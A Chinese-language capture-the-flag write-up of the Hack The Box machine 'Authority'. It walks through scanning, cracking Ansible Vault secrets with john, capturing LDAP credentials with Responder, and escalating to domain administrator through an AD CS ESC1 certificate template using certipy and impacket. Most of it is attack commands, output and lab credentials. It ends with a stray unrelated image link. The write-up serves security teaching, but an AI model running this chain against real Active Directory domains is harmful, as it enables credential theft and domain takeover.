端口扫描
nmap -sC -sV -p- -Pn -T4 10.10.11.222
Starting Nmap 7.92 ( https://nmap.org ) at 2024-10-04 19:42 CST
Nmap scan report for 10.10.11.222 (10.10.11.222)
Host is up (0.40s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-04 15:44:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:22+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:21+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:22+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:21+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8443/tcp open ssl/https-alt
|http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Fri, 04 Oct 2024 15:44:13 GMT
| Connection: close
|
| GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Fri, 04 Oct 2024 15:44:08 GMT
| Connection: close
|
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Fri, 04 Oct 2024 15:44:11 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Fri, 04 Oct 2024 15:44:22 GMT
| Connection: close
| <!doctype html>
HTTP Status 400
| Request
Type Exception Report
Message Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]
Description The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2024-10-02T14:55:01
|_Not valid after: 2026-10-05T02:33:25
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
51685/tcp open msrpc Microsoft Windows RPC
51731/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=10/4%Time=66FFD509%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,DB,"HTTP/1.1\x20200\x20\r\nContent-Type:\x20text/html;c
SF:harset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Fri,\x2004\x20Oc
SF:t\x202024\x2015:44:08\x20GMT\r\nConnection:\x20close\r\n\r\n\n\n\n\n\n<
SF:html><meta\x20http-equiv="refresh"\x20content="0;URL='/pwm'"/
SF:>")%r(HTTPOptions,7D,"HTTP/1.1\x20200\x20\r\nAllow:\x20G
SF:ET,\x20HEAD,\x20POST,\x20OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Fr
SF:i,\x2004\x20Oct\x202024\x2015:44:11\x20GMT\r\nConnection:\x20close\r\n
SF:r\n")%r(FourOhFourRequest,DB,"HTTP/1.1\x20200\x20\r\nContent-Type:\x20
SF:text/html;charset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Fri,
SF:x2004\x20Oct\x202024\x2015:44:13\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:\n\n\n\n\n<meta\x20http-equiv="refresh"\x20content="0;UR
SF:L='/pwm'"/>")%r(RTSPRequest,82C,"HTTP/1.1\x20400\x20\r
SF:nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r
SF:nContent-Length:\x201936\r\nDate:\x20Fri,\x2004\x20Oct\x202024\x2015:44
SF::22\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng="en">
SF:Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background
SF:-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}
SF:x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bla
SF:ck;}\x20.line\x20{height:1px;background-color:#525D76;border:none;}</s
SF:tyle>
HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20R
SF:equest
<hr\x20class="line"\x20/>Type\x20Exception\x20Re
SF:port
Message\x20Invalid\x20character\x20found\x20in\x20the
SF:\x20HTTP\x20protocol\x20[RTSP/1.00x0d0x0a0x0d0x0a...]
<
SF:b>Description\x20The\x20server\x20cannot\x20or\x20will\x20not\x20pr
SF:ocess\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20perc
SF:eived\x20to\x20be\x20a\x20client\x20error\x20(e.g.,\x20malformed\x20
SF:request\x20syntax,\x20invalid\x20");
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-04T15:45:09
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.77 seconds
发现有很多服务,进行信息收集
在445中不难发现可以匿名登录
查看development目录的内容,不难发现有一个文件夹
对8443端口探测,是一个pwm的管理后台
PWM(Privileged Web Manager)服务 是一个用于管理、控制和审核特权账户(如管理员账户)的系统。通常,PWM 用于企业环境中,以确保对特权账户的访问得到适当的控制和监视。它是一种 Web 基础的管理工具,允许管理员通过浏览器访问和管理特权账户,并提供集中的安全审计和报告功能。
PWM 服务的主要功能
特权账户管理
:PWM 服务用于集中管理所有特权账户(例如域管理员、系统管理员等)。它允许管理员控制这些账户的使用、访问和授权。
自动化密码管理
:PWM 可以帮助自动化特权账户的密码更改周期。系统会定期更改这些账户的密码,并确保密码符合组织的安全要求。
审计与日志记录
:PWM 通过详细的审计日志记录用户访问特权账户的行为。这有助于安全团队监视特权账户的使用情况,并在发生不正常活动时及时采取措施。
多因素认证(MFA)
:PWM 支持多因素认证,以增强特权账户的安全性,确保只有授权人员可以访问敏感账户。
访问控制和策略
:通过 PWM,管理员可以定义特定的访问控制策略,确保不同级别的用户只能访问他们需要的特权账户。
会话监控和回放
:PWM 系统能够监控管理员在使用特权账户时的操作,并支持会话回放功能,可以查看所有与特权账户相关的操作细节
通过共享目录不难发现pwm下存在加密的密码存储
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
!@#$%^&*
svc_pwm
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
!@#$%^&*
pWm_@dm!N_!23
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
!@#$%^&*
DevT3st@123
利用的是ansible加密,利用john爆破加密密钥
先将密文部分存储在一个文件hash中
$ANSIBLE_VAULT;1.1......
ansible2john hash > hash.1
john hash.1 --wordlist=/usr/share/wordlists/rockyou.txt
加密密钥为:!@#$%^&*
发现加密密钥都一样
分别解密
ansible-vault decrypt 密文文件
密码分别为
svc_pwm
pWm_@dm!N_!23
DevT3st@123
此时并不知道有哪些账号
查看pwm后台有哪些功能
发现只需要输入密码
用得到的密码尝试登录
发现 pWm_@dm!N_!23可成功登录
点击editor功能
不难发现可以发起ldap路径的查询
添加本机的ip,利用responder监听
点击test ldap profile
在本机监听
responder -I tun0
可以得到svc_ldap:lDaP_1n_th3_cle4r!
直接evil-winrm远程登录
获取到了用户标识
接下来进行提权操作
查看用户特权等信息
whoami /all
可以看到用户svc_ldap在证书服务组里
尝试adcs提权,搜索漏洞
certipy-ad find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout -dc-ip 10.10.11.222
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[] Finding certificate templates
[] Found 37 certificate templates
[] Finding certificate authorities
[] Found 1 certificate authority
[] Found 13 enabled certificate templates
[] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : AutoEnrollmentCheckUserDsCertificate
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
不难发现存在esc1漏洞
利用漏洞
申请管理员的证书
certipy-ad req -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -debug
发现报错code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
经过搜索发现需要计算机账号发起才行
这个链接有解释https://github.com/ly4k/Certipy/issues/199
添加一个计算机账号
impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -computer-name test -computer-pass 123456 -dc-ip 10.10.11.222 -debug
申请管理员证书
certipy-ad req -u 'test$' -p '123456' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -debug
获取管理员hash
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.222
发现报错
Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type
这个错误表示 Kerberos KDC(密钥分发中心,通常是域控制器)不支持客户端请求时发送的 Pre-Authentication Data (padata) 类型
搜索发现可以利用ldaps的方式发起认证,详细解释看
https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.222 -ldap-shell
发现可以将用户添加到组,将用户svc_ldap用户添加到administrators组
重新连接svc_ldap
![P2341 [USACO03FALL / HAOI2006] 受欢迎的牛 G(缩点)](https://img2024.cnblogs.com/blog/3599636/202503/3599636-20250316202328558-1067513376.png)
